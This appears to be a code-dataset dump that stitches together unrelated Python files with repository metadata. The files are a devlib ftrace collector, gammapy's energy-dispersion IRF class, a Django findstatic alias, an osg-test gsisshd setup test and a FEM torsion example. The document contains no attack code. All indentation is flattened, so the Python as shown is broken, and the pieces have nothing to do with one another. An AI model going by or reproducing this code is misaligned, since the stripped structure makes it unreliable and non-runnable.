break
else:
attempt_buffer_size -= self.buffer_size_step
if buffer_size == target_buffer_size:
return
while attempt_buffer_size < target_buffer_size:
attempt_buffer_size += self.buffer_size_step
self.target.write_value(self.buffer_size_file, attempt_buffer_size, verify=False)
buffer_size = self.target.read_int(self.buffer_size_file)
if attempt_buffer_size != buffer_size:
message = 'Failed to set trace buffer size to {}, value set was {}'
self.logger.warning(message.format(target_buffer_size, buffer_size))
break
def _build_trace_events(events):
event_string = ' '.join(['-e {}'.format(e) for e in events])
return event_string
def _build_trace_functions(functions):
function_string = " ".join(functions)
return function_string
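A minimal sketch of how the collector above is typically driven. The `Target` construction is an assumption (any rooted devlib target would do) and `run_workload` is a placeholder; only methods defined in the class above are called, and `get_trace` additionally needs `trace-cmd` on the host when `autoreport=True`.

```python
# Sketch only: target construction and the workload are placeholders.
from devlib import LocalLinuxTarget
from devlib.trace.ftrace import FtraceCollector

target = LocalLinuxTarget()              # hypothetical rooted devlib target
collector = FtraceCollector(target,
                            events=['sched_switch', 'cpu_frequency'],
                            buffer_size=10240)

collector.reset()                        # resize and clear the trace buffer
collector.start()                        # start tracing, write start marker
run_workload()                           # placeholder for the code under test
collector.stop()                         # stop tracing, write stop marker
collector.get_trace('trace.dat')         # pull trace.dat (plus trace.txt report)
```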
avg_line_length: 44.252874 | max_line_length: 110 | alphanum_fraction: 0.603117
content_no_comment:
from __future__ import division
import os
import json
import time
import re
import subprocess
from devlib.trace import TraceCollector
from devlib.host import PACKAGE_BIN_DIRECTORY
from devlib.exception import TargetError, HostError
from devlib.utils.misc import check_output, which
TRACE_MARKER_START = 'TRACE_MARKER_START'
TRACE_MARKER_STOP = 'TRACE_MARKER_STOP'
OUTPUT_TRACE_FILE = 'trace.dat'
OUTPUT_PROFILE_FILE = 'trace_stat.dat'
DEFAULT_EVENTS = [
'cpu_frequency',
'cpu_idle',
'sched_migrate_task',
'sched_process_exec',
'sched_process_fork',
'sched_stat_iowait',
'sched_switch',
'sched_wakeup',
'sched_wakeup_new',
]
TIMEOUT = 180
CPU_RE = re.compile(r' Function \(CPU([0-9]+)\)')
STATS_RE = re.compile(r'([^ ]*) +([0-9]+) +([0-9.]+) us +([0-9.]+) us +([0-9.]+) us')
class FtraceCollector(TraceCollector):
def __init__(self, target,
events=None,
functions=None,
buffer_size=None,
buffer_size_step=1000,
tracing_path='/sys/kernel/debug/tracing',
automark=True,
autoreport=True,
autoview=False,
no_install=False,
strict=False,
report_on_target=False,
):
super(FtraceCollector, self).__init__(target)
self.events = events if events is not None else DEFAULT_EVENTS
self.functions = functions
self.buffer_size = buffer_size
self.buffer_size_step = buffer_size_step
self.tracing_path = tracing_path
self.automark = automark
self.autoreport = autoreport
self.autoview = autoview
self.report_on_target = report_on_target
self.target_output_file = target.path.join(self.target.working_directory, OUTPUT_TRACE_FILE)
text_file_name = target.path.splitext(OUTPUT_TRACE_FILE)[0] + '.txt'
self.target_text_file = target.path.join(self.target.working_directory, text_file_name)
self.target_binary = None
self.host_binary = None
self.start_time = None
self.stop_time = None
self.event_string = None
self.function_string = None
self._reset_needed = True
self.available_events_file = self.target.path.join(self.tracing_path, 'available_events')
self.available_functions_file = self.target.path.join(self.tracing_path, 'available_filter_functions')
self.buffer_size_file = self.target.path.join(self.tracing_path, 'buffer_size_kb')
self.current_tracer_file = self.target.path.join(self.tracing_path, 'current_tracer')
self.function_profile_file = self.target.path.join(self.tracing_path, 'function_profile_enabled')
self.marker_file = self.target.path.join(self.tracing_path, 'trace_marker')
self.ftrace_filter_file = self.target.path.join(self.tracing_path, 'set_ftrace_filter')
self.host_binary = which('trace-cmd')
self.kernelshark = which('kernelshark')
if not self.target.is_rooted:
raise TargetError('trace-cmd instrument cannot be used on an unrooted device.')
if self.autoreport and not self.report_on_target and self.host_binary is None:
raise HostError('trace-cmd binary must be installed on the host if autoreport=True.')
if self.autoview and self.kernelshark is None:
raise HostError('kernelshark binary must be installed on the host if autoview=True.')
if not no_install:
host_file = os.path.join(PACKAGE_BIN_DIRECTORY, self.target.abi, 'trace-cmd')
self.target_binary = self.target.install(host_file)
else:
if not self.target.is_installed('trace-cmd'):
raise TargetError('No trace-cmd found on device and no_install=True is specified.')
self.target_binary = 'trace-cmd'
available_events = self.target.execute(
'cat {}'.format(self.available_events_file),
as_root=True).splitlines()
selected_events = []
for event in self.events:
_event = event
if event[0] != '*':
_event = '*' + event
event_re = re.compile(_event.replace('*', '.*'))
if len(filter(event_re.match, available_events)) == 0:
message = 'Event [{}] not available for tracing'.format(event)
if strict:
raise TargetError(message)
self.target.logger.warning(message)
else:
selected_events.append(event)
if self.functions and len(selected_events) == 0:
selected_events = ['sched_wakeup_new']
self.event_string = _build_trace_events(selected_events)
if self.functions:
if not self.target.file_exists(self.function_profile_file):
raise TargetError('Function profiling not supported. '\
'A kernel build with CONFIG_FUNCTION_PROFILER enable is required')
available_functions = self.target.execute(
'cat {}'.format(self.available_functions_file),
as_root=True).splitlines()
selected_functions = []
for function in self.functions:
if function not in available_functions:
message = 'Function [{}] not available for profiling'.format(function)
if strict:
raise TargetError(message)
self.target.logger.warning(message)
else:
selected_functions.append(function)
self.function_string = _build_trace_functions(selected_functions)
def reset(self):
if self.buffer_size:
self._set_buffer_size()
self.target.execute('{} reset'.format(self.target_binary),
as_root=True, timeout=TIMEOUT)
self._reset_needed = False
def start(self):
self.start_time = time.time()
if self._reset_needed:
self.reset()
self.target.execute('{} start {}'.format(self.target_binary, self.event_string),
as_root=True)
if self.automark:
self.mark_start()
if 'cpufreq' in self.target.modules:
self.logger.debug('Trace CPUFreq frequencies')
self.target.cpufreq.trace_frequencies()
if 'cpuidle' in self.target.modules:
self.logger.debug('Trace CPUIdle states')
self.target.cpuidle.perturb_cpus()
if self.functions:
self.target.execute('echo nop > {}'.format(self.current_tracer_file),
as_root=True)
self.target.execute('echo 0 > {}'.format(self.function_profile_file),
as_root=True)
self.target.execute('echo {} > {}'.format(self.function_string, self.ftrace_filter_file),
as_root=True)
self.target.execute('echo 1 > {}'.format(self.function_profile_file),
as_root=True)
def stop(self):
if self.functions:
self.target.execute('echo 1 > {}'.format(self.function_profile_file),
as_root=True)
if 'cpufreq' in self.target.modules:
self.logger.debug('Trace CPUFreq frequencies')
self.target.cpufreq.trace_frequencies()
self.stop_time = time.time()
if self.automark:
self.mark_stop()
self.target.execute('{} stop'.format(self.target_binary),
timeout=TIMEOUT, as_root=True)
self._reset_needed = True
def get_trace(self, outfile):
if os.path.isdir(outfile):
outfile = os.path.join(outfile, os.path.basename(self.target_output_file))
self.target.execute('{0} extract -o {1}; chmod 666 {1}'.format(self.target_binary,
self.target_output_file),
timeout=TIMEOUT, as_root=True)
pull_timeout = 10 * (self.stop_time - self.start_time)
self.target.pull(self.target_output_file, outfile, timeout=pull_timeout)
if not os.path.isfile(outfile):
self.logger.warning('Binary trace not pulled from device.')
else:
if self.autoreport:
textfile = os.path.splitext(outfile)[0] + '.txt'
if self.report_on_target:
self.generate_report_on_target()
self.target.pull(self.target_text_file,
textfile, timeout=pull_timeout)
else:
self.report(outfile, textfile)
if self.autoview:
self.view(outfile)
def get_stats(self, outfile):
if not self.functions:
return
if os.path.isdir(outfile):
outfile = os.path.join(outfile, OUTPUT_PROFILE_FILE)
output = self.target._execute_util('ftrace_get_function_stats',
as_root=True)
function_stats = {}
for line in output.splitlines():
match = CPU_RE.search(line)
if match:
cpu_id = int(match.group(1))
function_stats[cpu_id] = {}
self.logger.debug("Processing stats for CPU%d...", cpu_id)
continue
match = STATS_RE.search(line)
if match:
fname = match.group(1)
function_stats[cpu_id][fname] = {
'hits' : int(match.group(2)),
'time' : float(match.group(3)),
'avg' : float(match.group(4)),
's_2' : float(match.group(5)),
}
self.logger.debug(" %s: %s",
fname, function_stats[cpu_id][fname])
self.logger.debug("FTrace stats output [%s]...", outfile)
with open(outfile, 'w') as fh:
json.dump(function_stats, fh, indent=4)
self.logger.debug("FTrace function stats save in [%s]", outfile)
return function_stats
def report(self, binfile, destfile):
try:
command = '{} report {} > {}'.format(self.host_binary, binfile, destfile)
self.logger.debug(command)
process = subprocess.Popen(command, stderr=subprocess.PIPE, shell=True)
_, error = process.communicate()
if process.returncode:
raise TargetError('trace-cmd returned non-zero exit code {}'.format(process.returncode))
if error:
self.logger.debug(error)
if os.path.isfile(destfile):
self.logger.debug('Verifying traces.')
with open(destfile) as fh:
for line in fh:
if 'EVENTS DROPPED' in line:
self.logger.warning('Dropped events detected.')
break
else:
self.logger.debug('Trace verified.')
else:
self.logger.warning('Could not generate trace.txt.')
except OSError:
raise HostError('Could not find trace-cmd. Please make sure it is installed and is in PATH.')
def generate_report_on_target(self):
command = '{} report {} > {}'.format(self.target_binary,
self.target_output_file,
self.target_text_file)
self.target.execute(command, timeout=TIMEOUT)
def view(self, binfile):
check_output('{} {}'.format(self.kernelshark, binfile), shell=True)
def teardown(self):
self.target.remove(self.target.path.join(self.target.working_directory, OUTPUT_TRACE_FILE))
def mark_start(self):
self.target.write_value(self.marker_file, TRACE_MARKER_START, verify=False)
def mark_stop(self):
self.target.write_value(self.marker_file, TRACE_MARKER_STOP, verify=False)
def _set_buffer_size(self):
target_buffer_size = self.buffer_size
attempt_buffer_size = target_buffer_size
buffer_size = 0
floor = 1000 if target_buffer_size > 1000 else target_buffer_size
while attempt_buffer_size >= floor:
self.target.write_value(self.buffer_size_file, attempt_buffer_size, verify=False)
buffer_size = self.target.read_int(self.buffer_size_file)
if buffer_size == attempt_buffer_size:
break
else:
attempt_buffer_size -= self.buffer_size_step
if buffer_size == target_buffer_size:
return
while attempt_buffer_size < target_buffer_size:
attempt_buffer_size += self.buffer_size_step
self.target.write_value(self.buffer_size_file, attempt_buffer_size, verify=False)
buffer_size = self.target.read_int(self.buffer_size_file)
if attempt_buffer_size != buffer_size:
message = 'Failed to set trace buffer size to {}, value set was {}'
self.logger.warning(message.format(target_buffer_size, buffer_size))
break
def _build_trace_events(events):
event_string = ' '.join(['-e {}'.format(e) for e in events])
return event_string
def _build_trace_functions(functions):
function_string = " ".join(functions)
return function_string
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 1c3e7755abcfd3bfa2f47c0829731b8bf801a9e2 | size: 8,752 | ext: py | lang: Python
max_stars: repo_path gammapy/irf/edisp/core.py | repo_name Rishank2610/gammapy | head 3cd64fdb2c53c8e5c697a9b85ef8d0486bff0b76 | licenses ["BSD-3-Clause"] | count 1 | events 2017-11-22T17:07:56.000Z to 2017-11-22T17:07:56.000Z
max_issues: repo_path gammapy/irf/edisp/core.py | repo_name Rishank2610/gammapy | head 3cd64fdb2c53c8e5c697a9b85ef8d0486bff0b76 | licenses ["BSD-3-Clause"] | count null | events null to null
max_forks: repo_path gammapy/irf/edisp/core.py | repo_name Rishank2610/gammapy | head 3cd64fdb2c53c8e5c697a9b85ef8d0486bff0b76 | licenses ["BSD-3-Clause"] | count 1 | events 2019-09-04T14:03:33.000Z to 2019-09-04T14:03:33.000Z
content:
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import numpy as np
import scipy.special
from astropy import units as u
from astropy.coordinates import Angle, SkyCoord
from astropy.visualization import quantity_support
from gammapy.maps import MapAxes, MapAxis, RegionGeom
from ..core import IRF
__all__ = ["EnergyDispersion2D"]
class EnergyDispersion2D(IRF):
"""Offset-dependent energy dispersion matrix.
Data format specification: :ref:`gadf:edisp_2d`
Parameters
----------
energy_axis_true : `MapAxis`
True energy axis
migra_axis : `MapAxis`
Energy migration axis
offset_axis : `MapAxis`
Field of view offset axis
data : `~numpy.ndarray`
Energy dispersion probability density
Examples
--------
Read energy dispersion IRF from disk:
>>> from gammapy.maps import MapAxis
>>> from gammapy.irf import EnergyDispersion2D
>>> filename = '$GAMMAPY_DATA/hess-dl3-dr1/data/hess_dl3_dr1_obs_id_020136.fits.gz'
>>> edisp2d = EnergyDispersion2D.read(filename, hdu="EDISP")
Create energy dispersion matrix (`~gammapy.irf.EnergyDispersion`)
for a given field of view offset and energy binning:
>>> energy = MapAxis.from_bounds(0.1, 20, nbin=60, unit="TeV", interp="log").edges
>>> edisp = edisp2d.to_edisp_kernel(offset='1.2 deg', energy=energy, energy_true=energy)
See Also
--------
EnergyDispersion
"""
tag = "edisp_2d"
required_axes = ["energy_true", "migra", "offset"]
def _mask_out_bounds(self, invalid):
return (
invalid[self.axes.index("energy_true")] & invalid[self.axes.index("migra")]
) | invalid[self.axes.index("offset")]
@classmethod
def from_gauss(
cls, energy_axis_true, migra_axis, offset_axis, bias, sigma, pdf_threshold=1e-6
):
"""Create Gaussian energy dispersion matrix (`EnergyDispersion2D`).
The output matrix will be Gaussian in (energy_true / energy).
        The ``bias`` and ``sigma`` should be either floats or arrays of the same
        dimension as ``energy_true``. ``bias`` refers to the mean value of the
        ``migra`` distribution minus one, i.e. ``bias=0`` means no bias.
        Note that the output matrix is flat in offset.
Parameters
----------
energy_axis_true : `MapAxis`
True energy axis
migra_axis : `~astropy.units.Quantity`
Migra axis
offset_axis : `~astropy.units.Quantity`
Bin edges of offset
bias : float or `~numpy.ndarray`
Center of Gaussian energy dispersion, bias
sigma : float or `~numpy.ndarray`
RMS width of Gaussian energy dispersion, resolution.
pdf_threshold : float, optional
Zero suppression threshold
"""
axes = MapAxes([energy_axis_true, migra_axis, offset_axis])
coords = axes.get_coord(mode="edges", axis_name="migra")
migra_min = coords["migra"][:, :-1, :]
migra_max = coords["migra"][:, 1:, :]
# Analytical formula for integral of Gaussian
s = np.sqrt(2) * sigma
t1 = (migra_max - 1 - bias) / s
t2 = (migra_min - 1 - bias) / s
pdf = (scipy.special.erf(t1) - scipy.special.erf(t2)) / 2
pdf = pdf / (migra_max - migra_min)
# no offset dependence
data = pdf * np.ones(axes.shape)
data[data < pdf_threshold] = 0
return cls(
axes=axes,
data=data.value,
)
def to_edisp_kernel(self, offset, energy_true=None, energy=None):
"""Detector response R(Delta E_reco, Delta E_true)
Probability to reconstruct an energy in a given true energy band
in a given reconstructed energy band
Parameters
----------
offset : `~astropy.coordinates.Angle`
Offset
energy_true : `~astropy.units.Quantity`, None
True energy axis
energy : `~astropy.units.Quantity`
Reconstructed energy axis
Returns
-------
edisp : `~gammapy.irf.EDispKernel`
Energy dispersion matrix
"""
from gammapy.makers.utils import make_edisp_kernel_map
offset = Angle(offset)
# TODO: expect directly MapAxis here?
if energy is None:
energy_axis = self.axes["energy_true"].copy(name="energy")
else:
energy_axis = MapAxis.from_energy_edges(energy)
if energy_true is None:
energy_axis_true = self.axes["energy_true"]
else:
energy_axis_true = MapAxis.from_energy_edges(
energy_true,
name="energy_true",
)
pointing = SkyCoord("0d", "0d")
center = pointing.directional_offset_by(
position_angle=0 * u.deg, separation=offset
)
geom = RegionGeom.create(region=center, axes=[energy_axis, energy_axis_true])
edisp = make_edisp_kernel_map(geom=geom, edisp=self, pointing=pointing)
return edisp.get_edisp_kernel()
def normalize(self):
"""Normalise energy dispersion"""
super().normalize(axis_name="migra")
def plot_migration(self, ax=None, offset=None, energy_true=None, **kwargs):
"""Plot energy dispersion for given offset and true energy.
Parameters
----------
ax : `~matplotlib.axes.Axes`, optional
Axis
offset : `~astropy.coordinates.Angle`, optional
Offset
energy_true : `~astropy.units.Quantity`, optional
True energy
**kwargs : dict
Keyword arguments forwarded to `~matplotlib.pyplot.plot`
Returns
-------
ax : `~matplotlib.axes.Axes`
Axis
"""
import matplotlib.pyplot as plt
ax = plt.gca() if ax is None else ax
if offset is None:
offset = Angle([1], "deg")
else:
offset = np.atleast_1d(Angle(offset))
if energy_true is None:
energy_true = u.Quantity([0.1, 1, 10], "TeV")
else:
energy_true = np.atleast_1d(u.Quantity(energy_true))
migra = self.axes["migra"]
with quantity_support():
for ener in energy_true:
for off in offset:
disp = self.evaluate(
offset=off, energy_true=ener, migra=migra.center
)
label = f"offset = {off:.1f}\nenergy = {ener:.1f}"
ax.plot(migra.center, disp, label=label, **kwargs)
migra.format_plot_xaxis(ax=ax)
ax.set_ylabel("Probability density")
ax.legend(loc="upper left")
return ax
def plot_bias(self, ax=None, offset=None, add_cbar=False, **kwargs):
"""Plot migration as a function of true energy for a given offset.
Parameters
----------
ax : `~matplotlib.axes.Axes`, optional
Axis
offset : `~astropy.coordinates.Angle`, optional
Offset
add_cbar : bool
Add a colorbar to the plot.
kwargs : dict
Keyword arguments passed to `~matplotlib.pyplot.pcolormesh`.
Returns
-------
ax : `~matplotlib.axes.Axes`
Axis
"""
import matplotlib.pyplot as plt
from matplotlib.colors import PowerNorm
kwargs.setdefault("cmap", "GnBu")
kwargs.setdefault("norm", PowerNorm(gamma=0.5))
ax = plt.gca() if ax is None else ax
if offset is None:
offset = Angle(1, "deg")
energy_true = self.axes["energy_true"]
migra = self.axes["migra"]
z = self.evaluate(
offset=offset,
energy_true=energy_true.center.reshape(1, -1, 1),
migra=migra.center.reshape(1, 1, -1),
).value[0]
with quantity_support():
caxes = ax.pcolormesh(energy_true.edges, migra.edges, z.T, **kwargs)
energy_true.format_plot_xaxis(ax=ax)
migra.format_plot_yaxis(ax=ax)
if add_cbar:
label = "Probability density (A.U.)"
ax.figure.colorbar(caxes, ax=ax, label=label)
return ax
def peek(self, figsize=(15, 5)):
"""Quick-look summary plots.
Parameters
----------
figsize : (float, float)
Size of the resulting plot
"""
import matplotlib.pyplot as plt
fig, axes = plt.subplots(nrows=1, ncols=3, figsize=figsize)
self.plot_bias(ax=axes[0])
self.plot_migration(ax=axes[1])
edisp = self.to_edisp_kernel(offset="1 deg")
edisp.plot_matrix(ax=axes[2])
plt.tight_layout()
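The probability density built in `from_gauss` above is just the bin-averaged Gaussian in `migra = E_reco / E_true`. A standalone numpy/scipy sketch of that calculation (the `bias` and `sigma` values are arbitrary examples, not taken from any IRF):

```python
# Standalone restatement of the bin-averaged Gaussian used in from_gauss above.
import numpy as np
from scipy.special import erf

bias, sigma = 0.0, 0.2                   # mean shift and width of (migra - 1)
migra_edges = np.linspace(0.2, 1.8, 81)  # migra = E_reco / E_true bin edges
m_lo, m_hi = migra_edges[:-1], migra_edges[1:]

s = np.sqrt(2) * sigma
# Integral of the Gaussian over each bin, divided by the bin width:
pdf = (erf((m_hi - 1 - bias) / s) - erf((m_lo - 1 - bias) / s)) / 2
pdf /= (m_hi - m_lo)

print(np.sum(pdf * (m_hi - m_lo)))       # ~1.0: densities integrate to one
```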
avg_line_length: 31.595668 | max_line_length: 92 | alphanum_fraction: 0.589808
content_no_comment:
import numpy as np
import scipy.special
from astropy import units as u
from astropy.coordinates import Angle, SkyCoord
from astropy.visualization import quantity_support
from gammapy.maps import MapAxes, MapAxis, RegionGeom
from ..core import IRF
__all__ = ["EnergyDispersion2D"]
class EnergyDispersion2D(IRF):
tag = "edisp_2d"
required_axes = ["energy_true", "migra", "offset"]
def _mask_out_bounds(self, invalid):
return (
invalid[self.axes.index("energy_true")] & invalid[self.axes.index("migra")]
) | invalid[self.axes.index("offset")]
@classmethod
def from_gauss(
cls, energy_axis_true, migra_axis, offset_axis, bias, sigma, pdf_threshold=1e-6
):
axes = MapAxes([energy_axis_true, migra_axis, offset_axis])
coords = axes.get_coord(mode="edges", axis_name="migra")
migra_min = coords["migra"][:, :-1, :]
migra_max = coords["migra"][:, 1:, :]
s = np.sqrt(2) * sigma
t1 = (migra_max - 1 - bias) / s
t2 = (migra_min - 1 - bias) / s
pdf = (scipy.special.erf(t1) - scipy.special.erf(t2)) / 2
pdf = pdf / (migra_max - migra_min)
data = pdf * np.ones(axes.shape)
data[data < pdf_threshold] = 0
return cls(
axes=axes,
data=data.value,
)
def to_edisp_kernel(self, offset, energy_true=None, energy=None):
from gammapy.makers.utils import make_edisp_kernel_map
offset = Angle(offset)
if energy is None:
energy_axis = self.axes["energy_true"].copy(name="energy")
else:
energy_axis = MapAxis.from_energy_edges(energy)
if energy_true is None:
energy_axis_true = self.axes["energy_true"]
else:
energy_axis_true = MapAxis.from_energy_edges(
energy_true,
name="energy_true",
)
pointing = SkyCoord("0d", "0d")
center = pointing.directional_offset_by(
position_angle=0 * u.deg, separation=offset
)
geom = RegionGeom.create(region=center, axes=[energy_axis, energy_axis_true])
edisp = make_edisp_kernel_map(geom=geom, edisp=self, pointing=pointing)
return edisp.get_edisp_kernel()
def normalize(self):
super().normalize(axis_name="migra")
def plot_migration(self, ax=None, offset=None, energy_true=None, **kwargs):
import matplotlib.pyplot as plt
ax = plt.gca() if ax is None else ax
if offset is None:
offset = Angle([1], "deg")
else:
offset = np.atleast_1d(Angle(offset))
if energy_true is None:
energy_true = u.Quantity([0.1, 1, 10], "TeV")
else:
energy_true = np.atleast_1d(u.Quantity(energy_true))
migra = self.axes["migra"]
with quantity_support():
for ener in energy_true:
for off in offset:
disp = self.evaluate(
offset=off, energy_true=ener, migra=migra.center
)
label = f"offset = {off:.1f}\nenergy = {ener:.1f}"
ax.plot(migra.center, disp, label=label, **kwargs)
migra.format_plot_xaxis(ax=ax)
ax.set_ylabel("Probability density")
ax.legend(loc="upper left")
return ax
def plot_bias(self, ax=None, offset=None, add_cbar=False, **kwargs):
import matplotlib.pyplot as plt
from matplotlib.colors import PowerNorm
kwargs.setdefault("cmap", "GnBu")
kwargs.setdefault("norm", PowerNorm(gamma=0.5))
ax = plt.gca() if ax is None else ax
if offset is None:
offset = Angle(1, "deg")
energy_true = self.axes["energy_true"]
migra = self.axes["migra"]
z = self.evaluate(
offset=offset,
energy_true=energy_true.center.reshape(1, -1, 1),
migra=migra.center.reshape(1, 1, -1),
).value[0]
with quantity_support():
caxes = ax.pcolormesh(energy_true.edges, migra.edges, z.T, **kwargs)
energy_true.format_plot_xaxis(ax=ax)
migra.format_plot_yaxis(ax=ax)
if add_cbar:
label = "Probability density (A.U.)"
ax.figure.colorbar(caxes, ax=ax, label=label)
return ax
def peek(self, figsize=(15, 5)):
import matplotlib.pyplot as plt
fig, axes = plt.subplots(nrows=1, ncols=3, figsize=figsize)
self.plot_bias(ax=axes[0])
self.plot_migration(ax=axes[1])
edisp = self.to_edisp_kernel(offset="1 deg")
edisp.plot_matrix(ax=axes[2])
plt.tight_layout()
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 1c3e78fd908e52d77a53d8e59192195a4a3ac042 | size: 183 | ext: py | lang: Python
max_stars: repo_path assetfiles/management/commands/findstatic.py | repo_name localmed/django-assetfiles | head 34089780126989f49e6b890b85a90047704fde37 | licenses ["MIT"] | count null | events null to null
max_issues: repo_path assetfiles/management/commands/findstatic.py | repo_name localmed/django-assetfiles | head 34089780126989f49e6b890b85a90047704fde37 | licenses ["MIT"] | count 2 | events 2017-02-11T20:10:46.000Z to 2017-02-11T20:10:56.000Z
max_forks: repo_path assetfiles/management/commands/findstatic.py | repo_name localmed/django-assetfiles | head 34089780126989f49e6b890b85a90047704fde37 | licenses ["MIT"] | count null | events null to null
content:
from django.contrib.staticfiles.management.commands import findstatic
"""
`findstatic` is used in exactly the same way as staticfiles' `findstatic`.
"""
Command = findstatic.Command
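As the module notes, the command behaves exactly like staticfiles' `findstatic`, so it can be run as `python manage.py findstatic <path>` or invoked programmatically (the asset path below is only an illustration):

```python
# Sketch: requires a configured Django project; 'css/base.css' is illustrative.
from django.core.management import call_command

call_command("findstatic", "css/base.css")
```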
avg_line_length: 26.142857 | max_line_length: 74 | alphanum_fraction: 0.786885
content_no_comment:
from django.contrib.staticfiles.management.commands import findstatic
Command = findstatic.Command
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 1c3e79916311ed421944b038cd76799d9f019587 | size: 2,003 | ext: py | lang: Python
max_stars: repo_path osgtest/tests/test_280_gsiopenssh.py | repo_name djw8605/osg-test | head 9cbbd48875863cb30627989c12df40e0daf3985c | licenses ["Apache-2.0"] | count 1 | events 2016-03-09T20:24:07.000Z to 2016-03-09T20:24:07.000Z
max_issues: repo_path osgtest/tests/test_280_gsiopenssh.py | repo_name djw8605/osg-test | head 9cbbd48875863cb30627989c12df40e0daf3985c | licenses ["Apache-2.0"] | count 122 | events 2016-03-23T16:59:07.000Z to 2022-02-23T18:25:34.000Z
max_forks: repo_path osgtest/tests/test_280_gsiopenssh.py | repo_name djw8605/osg-test | head 9cbbd48875863cb30627989c12df40e0daf3985c | licenses ["Apache-2.0"] | count 14 | events 2016-03-09T17:54:20.000Z to 2021-07-02T15:51:23.000Z
content:
from osgtest.library import core
from osgtest.library import osgunittest
from osgtest.library import files
from osgtest.library import service
SSHD_CONFIG = "/etc/gsissh/sshd_config"
SSHD_CONFIG_TEXT = r'''
Port %(port)s
AuthorizedKeysFile .ssh/authorized_keys
UsePrivilegeSeparation sandbox
GSSAPIAuthentication yes
GSSAPIDelegateCredentials yes
GSSAPICleanupCredentials yes
GSSAPIStrictAcceptorCheck yes
GSSAPIKeyExchange yes
RSAAuthentication no
PubkeyAuthentication no
PasswordAuthentication no
ChallengeResponseAuthentication no
Subsystem sftp /usr/libexec/gsissh/sftp-server
'''
class TestStartGSIOpenSSH(osgunittest.OSGTestCase):
@core.osgrelease('3.5')
def setUp(self):
core.skip_ok_unless_installed('gsi-openssh-server', 'gsi-openssh-clients')
def test_01_set_config(self):
port = core.config['gsisshd.port'] = '2222'
core.state['gsisshd.can-run'] = (not (
core.el_release() >= 7 and
core.state['selinux.mode'] and
not core.dependency_is_installed("/usr/sbin/semanage")))
self.skip_ok_unless(core.state['gsisshd.can-run'],
"Can't run with SELinux on EL >= 7 without semanage")
files.write(
SSHD_CONFIG,
SSHD_CONFIG_TEXT % {'port': port},
owner='gsissh',
chmod=0o600)
def test_02_setup_selinux_port(self):
if not core.state['selinux.mode']:
self.skip_ok('SELinux disabled')
core.skip_ok_unless_installed("/usr/sbin/semanage", by_dependency=True)
port = core.config['gsisshd.port']
core.check_system(['semanage', 'port', '--add', '-t', 'ssh_port_t', '--proto', 'tcp', port],
message="Allow [gsi]sshd to use port %s" % port)
def test_03_start(self):
core.state['gsisshd.started-service'] = False
self.skip_ok_unless(core.state['gsisshd.can-run'], "Can't run gsisshd (see above)")
service.check_start('gsisshd')
avg_line_length: 33.383333 | max_line_length: 100 | alphanum_fraction: 0.673989
content_no_comment:
from osgtest.library import core
from osgtest.library import osgunittest
from osgtest.library import files
from osgtest.library import service
SSHD_CONFIG = "/etc/gsissh/sshd_config"
SSHD_CONFIG_TEXT = r'''
Port %(port)s
AuthorizedKeysFile .ssh/authorized_keys
UsePrivilegeSeparation sandbox
GSSAPIAuthentication yes
GSSAPIDelegateCredentials yes
GSSAPICleanupCredentials yes
GSSAPIStrictAcceptorCheck yes
GSSAPIKeyExchange yes
RSAAuthentication no
PubkeyAuthentication no
PasswordAuthentication no
ChallengeResponseAuthentication no
Subsystem sftp /usr/libexec/gsissh/sftp-server
'''
class TestStartGSIOpenSSH(osgunittest.OSGTestCase):
@core.osgrelease('3.5')
def setUp(self):
core.skip_ok_unless_installed('gsi-openssh-server', 'gsi-openssh-clients')
def test_01_set_config(self):
port = core.config['gsisshd.port'] = '2222'
core.state['gsisshd.can-run'] = (not (
core.el_release() >= 7 and
core.state['selinux.mode'] and
not core.dependency_is_installed("/usr/sbin/semanage")))
self.skip_ok_unless(core.state['gsisshd.can-run'],
"Can't run with SELinux on EL >= 7 without semanage")
files.write(
SSHD_CONFIG,
SSHD_CONFIG_TEXT % {'port': port},
owner='gsissh',
chmod=0o600)
def test_02_setup_selinux_port(self):
if not core.state['selinux.mode']:
self.skip_ok('SELinux disabled')
core.skip_ok_unless_installed("/usr/sbin/semanage", by_dependency=True)
port = core.config['gsisshd.port']
core.check_system(['semanage', 'port', '--add', '-t', 'ssh_port_t', '--proto', 'tcp', port],
message="Allow [gsi]sshd to use port %s" % port)
def test_03_start(self):
core.state['gsisshd.started-service'] = False
self.skip_ok_unless(core.state['gsisshd.can-run'], "Can't run gsisshd (see above)")
service.check_start('gsisshd')
| true
| true
|
1c3e7a4fba332045a6cc535936322932cb36765b
| 1,410
|
py
|
Python
|
Examples/example35.py
|
ZibraMax/FEM
|
b868c60408a4f83dec4bb424d66be0b20e2ac71b
|
[
"MIT"
] | 10
|
2021-03-21T18:38:40.000Z
|
2022-02-22T01:32:06.000Z
|
Examples/example35.py
|
ZibraMax/FEM
|
b868c60408a4f83dec4bb424d66be0b20e2ac71b
|
[
"MIT"
] | null | null | null |
Examples/example35.py
|
ZibraMax/FEM
|
b868c60408a4f83dec4bb424d66be0b20e2ac71b
|
[
"MIT"
] | 1
|
2022-02-08T04:40:59.000Z
|
2022-02-08T04:40:59.000Z
|
import numpy as np
import matplotlib.pyplot as plt
from FEM.Torsion2D import Torsion2D
from FEM.Mesh.Delaunay import Delaunay
a = 0.3
b = 0.3
tw = 0.05
tf = 0.05
E = 200000
v = 0.27
G = E / (2 * (1 + v))
phi = 1
vertices = [
[0, 0],
[a, 0],
[a, tf],
[a / 2 + tw / 2, tf],
[a / 2 + tw / 2, tf + b],
[a, tf + b],
[a, 2 * tf + b],
[0, 2 * tf + b],
[0, tf + b],
[a / 2 - tw / 2, tf + b],
[a / 2 - tw / 2, tf],
[0, tf],
]
fillet_radius = 0.0254
fillets = [{'start_segment': 2, 'end_segment': 3, 'r': fillet_radius, 'n': 10},
{'start_segment': 3, 'end_segment': 4, 'r': fillet_radius, 'n': 10},
{'start_segment': 8, 'end_segment': 9, 'r': fillet_radius, 'n': 10},
{'start_segment': 9, 'end_segment': 10, 'r': fillet_radius, 'n': 10}]
params = Delaunay._strdelaunay(constrained=True, delaunay=True,
a='0.00003', o=2)
geometria = Delaunay(vertices, params, fillets=fillets)
geometria.show()
plt.show()
# geometria.saveMesh('Mesh_tests/I_test')
# geometria = Mesh.Geometry.loadmsh('Mesh_tests/I_test.msh')
print(len(geometria.elements))
O = Torsion2D(geometria, G, phi)
O.solve()
plt.show()
integral = 0
